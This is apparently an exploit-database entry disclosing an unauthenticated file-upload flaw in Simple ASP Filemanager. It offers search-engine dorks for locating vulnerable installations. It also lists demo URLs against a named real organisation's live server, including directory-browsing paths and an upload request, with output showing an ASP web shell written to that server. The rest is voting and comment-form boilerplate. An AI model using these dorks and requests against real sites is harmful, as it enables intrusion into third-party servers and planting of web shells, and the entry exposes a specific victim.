Simple ASP Filemanager upload shell

2017.07.10

anonymous-iran (FR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:safm.asp ext:asp

[+] test : windows 10
[+] Website: www.anonymous-team.com
[+] source code : https://github.com/windylea/simple-asp-file-manager
dork:
inurl:safm.asp ext:asp
intitle:"ASP File Browser" ext:asp
After checking, no password has been added
After your search, you're gonna have the ability to do it in your tag. Upload file and .....
demo :
http://www.asycuda.org/wnfiles/mad.asp?browse=E:%5Cinetpub%5Cnewasy%5C_ScriptLibrary%5C
http://www.asycuda.org/wnfiles/mad.asp?browse=E:%5Cinetpub%5Cnewasy%5Cupltest%5C
http://www.asycuda.org/wnfiles/mad.asp?browse=E:%5Cinetpub%5Cnewasy%5Cbookresource%5C
asp shell upload
http://www.asycuda.org/wnfiles/mad.asp?upload=E%3A%5Cinetpub%5Cnewasy
Uploaded File: E:\inetpub\newasy\pouya.asp
Content Type: application/octet-stream

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Simple ASP Filemanager upload shell

Dork: inurl:safm.asp ext:asp

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.